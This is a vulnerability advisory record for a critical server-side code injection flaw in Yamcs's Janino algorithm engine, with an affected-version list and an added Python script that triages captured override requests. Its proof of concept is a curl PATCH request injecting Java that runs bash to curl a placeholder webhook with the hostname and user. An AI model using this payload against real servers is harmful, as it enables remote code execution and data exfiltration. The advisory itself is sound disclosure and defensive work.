GHSA-524g-x36v-9wm6

Source
https://github.com/advisories/GHSA-524g-x36v-9wm6
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-524g-x36v-9wm6/GHSA-524g-x36v-9wm6.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-524g-x36v-9wm6
Aliases
  • CVE-2026-44632
Published
2026-05-27T00:05:45Z
Modified
2026-05-27T00:15:08.269280685Z
Severity
  • 9.1 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Summary
Yamcs Vulnerable to Server-Side Code Injection (RCE) via Janino Expression Engine in `JavaExprAlgorithmExecutionFactory`
Details

Summary

A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.

Proof of Concept (PoC)

The vulnerability can be exploited by overriding an existing algorithm's text via the REST API and injecting a malicious Java payload that executes OS commands.

Prerequisites:

  1. A running Yamcs instance with an active processor (e.g., instance=myproject, processor=realtime).
  2. An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.

Steps to Reproduce:

  1. Send an authenticated HTTP PATCH request to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g., copySunsensor). The payload uses java.lang.Runtime to execute a reverse shell or ping an external webhook.
curl -i -X PATCH \
  'http://<YAMCS-SERVER-IP>:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor' \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \
  -d '{
    "action": "SET",
    "algorithm": {
      "text": "try { java.lang.Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", \"curl https://<YOUR-WEBHOOK-URL>/$(hostname)_$(whoami)\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);"
    }
  }'
  2. Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the simulator.py script to generate sun sensor data).
  3. The Yamcs server uses the Janino SimpleCompiler to compile the injected text into a Java class on the fly. Since no restrictive ClassLoader is applied, the payload is successfully compiled and executed.
  4. Verify that the command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.

Impact

This vulnerability allows a user with application-level configuration privileges to escalate their access to full System/OS control. This leads to arbitrary command execution, potential data exfiltration, and lateral movement within the network hosting the Yamcs server.
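
For servers that cannot yet move to 5.12.7, requests that set algorithm text through the MDB override endpoint can be pulled out of captured HTTP traffic and triaged. The following is an added example, not code from Yamcs or from the advisory; the record layout (method, path, user, body), the marker list and the function names are assumptions of the example, and the sample records are constructed.

```python
import json
import re

# Endpoint shape taken from the advisory's PoC request.
OVERRIDE_PATH = re.compile(
    r"^/api/mdb/(?P<instance>[^/]+)/(?P<processor>[^/]+)/algorithms/(?P<algorithm>.+)$")

# Triage markers chosen for this example (assumption, not exhaustive).
# Absence of a marker does not make an override safe: on affected versions
# any submitted text is compiled and run without a sandbox.
MARKERS = {
    "process execution": re.compile(r"\b(?:Runtime|ProcessBuilder)\b"),
    "reflection or class loading": re.compile(r"\b(?:ClassLoader|forName|reflect)\b"),
    "file or network I/O": re.compile(r"\bjava\s*\.\s*(?:io|nio|net)\b"),
}

def review_request(record):
    """Return a finding for a request that sets algorithm text, else None."""
    match = OVERRIDE_PATH.match(record.get("path", ""))
    if record.get("method") != "PATCH" or not match:
        return None
    finding = {**match.groupdict(), "user": record.get("user"), "markers": []}
    try:
        body = json.loads(record.get("body") or "")
    except ValueError:
        # A body that cannot be parsed cannot be cleared; hand it to a human.
        return {**finding, "severity": "review", "reason": "unparseable body"}
    algorithm = body.get("algorithm") if isinstance(body, dict) else None
    text = algorithm.get("text") if isinstance(algorithm, dict) else None
    if not isinstance(text, str):
        return None  # the request does not carry algorithm text
    finding["markers"] = sorted(n for n, rx in MARKERS.items() if rx.search(text))
    finding["severity"] = "high" if finding["markers"] else "review"
    return finding

def triage(records):
    """Findings for every record that sets algorithm text."""
    return [f for f in map(review_request, records) if f]

# Constructed sample records (e.g. from a reverse proxy that logs request bodies).
ALGO = "/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor"
SAMPLE = [
    {"method": "PATCH", "user": "operator1", "path": ALGO,
     "body": json.dumps({"action": "SET", "algorithm": {"text":
         'java.lang.Runtime.getRuntime().exec("<command>"); out0.setFloatValue(1.0f);'}})},
    {"method": "PATCH", "user": "operator2", "path": ALGO,
     "body": json.dumps({"action": "SET", "algorithm": {"text": "out0.setFloatValue(2.0f);"}})},
    {"method": "GET", "user": "viewer", "path": "/api/mdb/myproject/parameters", "body": ""},
]
```

Every override is reported, with marker hits only raising its priority, because string matching on Java source is easy to evade and the fix remains upgrading to 5.12.7.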

Credits

Discovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.

Database specific
{
    "github_reviewed_at": "2026-05-27T00:05:45Z",
    "nvd_published_at": null,
    "severity": "CRITICAL",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-94"
    ]
}
Affected packages

Maven / org.yamcs:yamcs-core

Package

Name
org.yamcs:yamcs-core
Purl
pkg:maven/org.yamcs/yamcs-core

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (Unknown introduced version / All previous versions are affected)
Fixed
5.12.7

Affected versions

0.*
0.29.3
0.30.0
3.*
3.0.0
3.1.0
3.1.1
3.1.2
3.2.0
3.2.1
3.2.2
3.3.0
3.3.1
3.4.0
3.4.1
3.4.2
3.4.3
3.4.4
3.4.5
3.4.6
3.4.8
3.4.11
4.*
4.0.0
4.0.1
4.1.1
4.1.2
4.2.0
4.2.1
4.2.2
4.3.0
4.3.1
4.4.0
4.4.1
4.4.2
4.5.0
4.6.0
4.6.1
4.6.2
4.6.3
4.7
4.7.1
4.7.3
4.8.0
4.8.1
4.9.0
4.9.1
4.9.2
4.9.3
4.9.4
4.10.0
4.10.1
4.10.2
4.10.3
4.10.4
4.10.5
4.10.6
4.10.7
4.10.8
4.10.9
5.*
5.0.0
5.1.0
5.1.1
5.1.2
5.1.3
5.1.4
5.2.0
5.2.1
5.2.2
5.2.3
5.2.4
5.2.5
5.2.6
5.3.0
5.3.1
5.3.2
5.3.3
5.3.4
5.3.5
5.3.6
5.4.0
5.4.1
5.4.2
5.4.3
5.4.4
5.4.5
5.5.0
5.5.1
5.5.2
5.5.3
5.5.4
5.5.5
5.5.6
5.5.7
5.6.0
5.6.1
5.6.2
5.7.0
5.7.1
5.7.2
5.7.3
5.7.4
5.7.5
5.7.6
5.7.7
5.7.8
5.7.9
5.7.10
5.7.11
5.7.12
5.7.13
5.8.0
5.8.1
5.8.2
5.8.3
5.8.4
5.8.5
5.8.6
5.8.7
5.8.8
5.9.0
5.9.1
5.9.2
5.9.3
5.9.4
5.9.5
5.9.6
5.9.7
5.9.8
5.9.8.1
5.9.9
5.9.10
5.9.11
5.9.12
5.10.0
5.10.1
5.10.2
5.10.3
5.10.4
5.10.5
5.10.6
5.10.7
5.10.8
5.10.9
5.10.10
5.10.11
5.10.12
5.11.0
5.11.1
5.11.2
5.11.3
5.11.4
5.11.5
5.11.6
5.11.7
5.11.8
5.11.9
5.11.10
5.11.11
5.11.12
5.11.13
5.12.0
5.12.1
5.12.2
5.12.3
5.12.4
5.12.5
5.12.6

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-524g-x36v-9wm6/GHSA-524g-x36v-9wm6.json"